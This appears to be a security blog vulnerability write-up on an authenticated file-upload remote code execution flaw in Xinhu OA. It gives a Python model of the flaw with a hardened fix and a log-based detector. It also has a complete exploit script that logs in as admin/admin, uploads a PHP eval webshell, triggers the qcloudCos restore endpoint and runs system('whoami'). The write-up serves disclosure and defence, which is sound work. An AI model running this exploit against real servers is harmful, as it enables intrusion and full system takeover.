Xinhu OA (信呼OA) - Backend File Upload RCE

Vulnerability Info · Cyber Security · 2023-09-08 · 471 views

Principle

The file upload endpoint enforces an extension whitelist, but a file whose extension is not on the whitelist is not rejected: it is stored under an added suffix (the PoC below shows it as .uptemp) with its contents base64-encoded, and the upload record is assigned an id. The run method of the qcloudCosAction class in webmain/task/runt/qcloudCosAction.php takes such an id, decodes the contents and restores the original extension without re-checking it. A quarantined .php upload therefore ends up back on disk as a .php file that the web server will parse and execute.
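The following is an added model of the mechanism just described, not code from Xinhu OA: a whitelist check at upload time that quarantines other files as base64-encoded .uptemp records, a restore step that reverses the quarantine with no re-check (the behaviour the page attributes to qcloudCosAction::run), and a hardened restore that applies the whitelist a second time. The whitelist contents, the in-memory record table, the helper names and the shell payload are all assumptions made for the example.

```python
import base64
import os
import tempfile

# Constructed whitelist for the model; the product's real list is not reproduced on the page.
ALLOWED_EXTS = {"jpg", "png", "gif", "pdf", "doc", "docx", "xls", "xlsx", "txt", "zip"}

# Constructed webshell content, matching the AHtest POST parameter the PoC uses.
SHELL = b"<?php eval($_POST['AHtest']); ?>"

# In-memory stand-in for the upload table: id -> (stored path, original extension)
_records = {}


def _split_ext(filename):
    base, dot, ext = filename.rpartition(".")
    if not dot:
        return filename, ""
    return base, ext.lower()


def save_upload(upload_dir, filename, content):
    """Model of the upload step: a whitelisted file is written as-is; anything
    else is base64-encoded and stored with a .uptemp suffix, which the web
    server does not execute.  Returns (file_id, stored_path)."""
    base, ext = _split_ext(filename)
    file_id = len(_records) + 1
    if ext in ALLOWED_EXTS:
        path = os.path.join(upload_dir, f"{base}.{ext}")
        data = content
    else:
        path = os.path.join(upload_dir, f"{base}.uptemp")
        data = base64.b64encode(content)
    with open(path, "wb") as fh:
        fh.write(data)
    _records[file_id] = (path, ext)
    return file_id, path


def restore_vulnerable(file_id):
    """Model of the restore step as the page describes it: decode the .uptemp
    file and give it back its original extension, with no re-check."""
    path, ext = _records[file_id]
    if not path.endswith(".uptemp"):
        return path  # nothing was quarantined
    with open(path, "rb") as fh:
        content = base64.b64decode(fh.read())
    restored = path[: -len(".uptemp")] + "." + ext
    with open(restored, "wb") as fh:
        fh.write(content)
    os.remove(path)
    _records[file_id] = (restored, ext)
    return restored


def restore_hardened(file_id):
    """Same step with the whitelist applied again at restore time: a file whose
    original extension is not allowed stays encoded and is never renamed."""
    _, ext = _records[file_id]
    if ext not in ALLOWED_EXTS:
        raise ValueError(f"refusing to restore disallowed extension: .{ext}")
    return restore_vulnerable(file_id)


def demo():
    """Upload the constructed shell and a PDF, then run both restore paths."""
    results = {}
    with tempfile.TemporaryDirectory() as d:
        fid, stored = save_upload(d, "shell.php", SHELL)
        results["stored_ext"] = os.path.splitext(stored)[1]        # quarantined as .uptemp
        restored = restore_vulnerable(fid)
        results["vulnerable_ext"] = os.path.splitext(restored)[1]  # back to .php
        with open(restored, "rb") as fh:
            results["content_intact"] = fh.read() == SHELL        # payload fully recovered

        fid2, _ = save_upload(d, "shell.php", SHELL)
        try:
            restore_hardened(fid2)
            results["hardened_refused"] = False
        except ValueError:
            results["hardened_refused"] = True

        fid3, _ = save_upload(d, "report.pdf", b"%PDF-1.4 constructed sample")
        results["pdf_ext"] = os.path.splitext(restore_hardened(fid3))[1]  # legitimate file unaffected
    return results


if __name__ == "__main__":
    print(demo())
```

The point the model makes is that the quarantine is only as strong as the last step that can undo it: once an id-addressable restore path exists, the extension check must be repeated there (or the restore must refuse anything that was quarantined in the first place), otherwise the whitelist is decorative.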

Impact

An authenticated attacker (the upload endpoint is behind the OA login) can execute arbitrary PHP on the server and gain full access to the system.

POC & EXP

import base64
import requests


session = requests.session()

url_pre = 'http://x.x.x.x'  # target base URL, without a trailing slash
url1 = url_pre + '/?a=check&m=login&d=&ajaxbool=true&rnd=533953'  # login
url2 = url_pre + '/index.php?a=upfile&m=upload&d=public&maxsize=100&ajaxbool=true&rnd=798913'  # upload
# url3 (the qcloudCos restore call) is built below once the upload id is known

username = 'admin'  # OA username
password = 'admin'  # OA password
# the login endpoint expects both fields base64-encoded
username = base64.b64encode(username.encode('utf-8')).decode('utf-8')
password = base64.b64encode(password.encode('utf-8')).decode('utf-8')

data1 = {
    'rempass': '0',
    'jmpass': 'false',
    'device': '1625884034525',
    'ltype': '0',
    'adminuser': username,
    'adminpass': password,
    'yanzm': ''
}

# 1. log in; the session object keeps the cookie for the following requests
r = session.post(url1, data=data1)

# 2. upload the webshell. shell.php is not on the whitelist, so the server stores it
#    base64-encoded under a .uptemp name and returns the record id and stored path.
#    shell.php is assumed to be a PHP eval shell reading the POST parameter AHtest
#    (the page does not show its contents).
with open('shell.php', 'rb') as file:
    r = session.post(url2, files={'file': file})

filepath = str(r.json()['filepath'])
filepath = '/' + filepath.split('.uptemp')[0] + '.php'  # path the file will have once restored
file_id = r.json()['id']
print(file_id)
print(filepath)

# 3. have qcloudCosAction::run decode the file and give it back its .php extension
url3 = url_pre + f'/task.php?m=qcloudCos|runt&a=run&fileid={file_id}'
r = session.get(url3)

# 4. run a command through the restored webshell
data2 = {
    'AHtest': 'system(\'whoami\')',
}
r = session.post(url_pre + filepath, data=data2)
print(r.text)
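On the defensive side, the PoC leaves a distinctive two-step trace in the web server access log: an upload request (a=upfile&m=upload) followed by a call to the restore endpoint (task.php?m=qcloudCos|runt&a=run&fileid=...) from the same client. The detector below is an added example, not part of the original page or of Xinhu OA; the log lines are constructed in common log format and the severity scheme is an assumption. Note that the pipe in the m parameter may appear raw or as %7C in logs, so the query string is parsed rather than string-matched.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Common log format: client, identd, user, [time], "METHOD PATH PROTO", status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3})'
)


def classify(request_path):
    """Return ('upload', None), ('restore', fileid) or (None, None) for a request path."""
    u = urlsplit(request_path)
    q = {k: v[0] for k, v in parse_qs(u.query).items()}  # parse_qs decodes %7C to |
    if u.path.endswith("index.php") and q.get("a") == "upfile" and q.get("m") == "upload":
        return "upload", None
    if u.path.endswith("task.php") and q.get("a") == "run" and q.get("m") == "qcloudCos|runt":
        return "restore", q.get("fileid")
    return None, None


def detect(lines):
    """One alert per call to the qcloudCos restore endpoint.  Severity is 'high'
    when the same client uploaded a file earlier in the log (the PoC sequence)
    and 'medium' otherwise, since the endpoint is rarely needed in normal use."""
    uploaded = set()
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, path = m.group("ip"), m.group("path")
        kind, fileid = classify(path)
        if kind == "upload":
            uploaded.add(ip)
        elif kind == "restore":
            alerts.append({"ip": ip, "fileid": fileid,
                           "severity": "high" if ip in uploaded else "medium"})
    return alerts


# Constructed sample: 10.0.0.5 follows the PoC, 10.0.0.9 is ordinary browsing,
# 10.0.0.7 calls the restore endpoint without an upload in this window.
SAMPLE_LOG = [
    '10.0.0.5 - - [08/Sep/2023:10:12:01 +0800] "POST /?a=check&m=login&d=&ajaxbool=true&rnd=533953 HTTP/1.1" 200 312',
    '10.0.0.9 - - [08/Sep/2023:10:12:01 +0800] "GET /index.php HTTP/1.1" 200 5120',
    '10.0.0.5 - - [08/Sep/2023:10:12:02 +0800] "POST /index.php?a=upfile&m=upload&d=public&maxsize=100&ajaxbool=true&rnd=798913 HTTP/1.1" 200 188',
    '10.0.0.5 - - [08/Sep/2023:10:12:03 +0800] "GET /task.php?m=qcloudCos%7Crunt&a=run&fileid=11 HTTP/1.1" 200 0',
    '10.0.0.7 - - [08/Sep/2023:10:15:40 +0800] "GET /task.php?m=qcloudCos|runt&a=run&fileid=12 HTTP/1.1" 200 0',
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```

Run against the sample, the detector raises a high-severity alert for 10.0.0.5 (upload then restore of fileid 11) and a medium one for 10.0.0.7. A follow-up POST to a freshly created .php path under the upload directory would be the third indicator, but the directory layout is deployment-specific and is not shown on the page, so it is left out here.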